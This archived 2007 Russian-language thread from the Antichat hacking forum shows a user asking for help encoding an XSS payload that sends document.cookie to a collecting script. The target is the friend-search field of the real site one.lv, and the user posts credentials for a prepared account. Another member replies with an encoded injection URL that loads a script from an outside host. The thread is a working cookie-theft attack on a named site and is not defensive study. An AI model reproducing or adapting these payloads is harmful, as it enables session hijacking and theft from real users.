ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.12.2007, 14:56
|
|
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466
Репутация:
6
|
|
xss шифровка
помогите вставить скрипт
--><script>document.write(String.fromCharCode(<scrip t>document.write("<img src=http://127.0.0.1/skript.php?kuki_one="+escape(document.cookie)+">") ;</script>));</script><!--
и обойти фильтр 
Я ломал голову, да нету у меня особых навыков навыков, но хотелось бы сделать, помогите пожалуйста перекодировать чтоб сайт принял мою наживу |
|
|
09.12.2007, 15:04
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
А фильтр на что ругаеться?
|
|
|
|
09.12.2007, 15:07
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
|
|
|
|
09.12.2007, 15:09
|
|
Познающий
Регистрация: 05.04.2006
Сообщений: 76
Провел на форуме:
2310584
Репутация:
73
|
|
http://old.antichat.ru/crackchat/HTML/
кури.
|
|
|
|
09.12.2007, 15:11
|
|
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466
Репутация:
6
|
|
я честно не могу разобратся в чём дело но ко мне доходит только: " escape(document.cookie) "
по моему он не обробатывает плюсы, но когда я заменил плюсы на %2B он всё равно это же и присылает.
P.S. большое спасибо за отзывчевость
|
|
|
|
09.12.2007, 15:22
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
Сообщение от Dumkopff
http://old.antichat.ru/crackchat/HTML/
кури.
если ты не в курсе инет кряк как раз и делает это, есть такая строка как стринг =\ хех
|
|
|
|
09.12.2007, 15:33
|
|
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466
Репутация:
6
|
|
я всё равно могу и декодировать и тут http://ha.ckers.org/xss.html#XSScalc , там всё же есть? не так ли? =[
эту уязвимость я пытаюсь осуществить на сайте one.lv (в поле слева - найти друга (http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=тут)
помогите подходяще закодировать пробовал кодировать весь урл, всё равно не работает...
Пожалуйста для меня это вопрос сложный, уже 2 день парюсь |
|
|
|
09.12.2007, 15:42
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
пля. там нужна регистрация... При реге надо воодить телефон =\ Я так понял туда пасс отправляеться =\
|
|
|
|
09.12.2007, 15:45
|
|
Новичок
Регистрация: 16.01.2007
Сообщений: 16
Провел на форуме:
56466
Репутация:
6
|
|
ой забыл, я хотел написать и подготовленый акаунт, извеняюсь
Login: offx
password: antichat
кстате, когда я ему впариваю %22%2B%22 он их декодирует не в: "+" (как должно быть) а в: " "
Последний раз редактировалось offiks; 09.12.2007 в 15:47..
|
|
|
|
09.12.2007, 15:58
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
http://c7.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri ends.fl.search=%22%3E;%3Cscript%20src=http://lamer-power.jino-net.ru/hek%3E%20%3C/script%3E
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
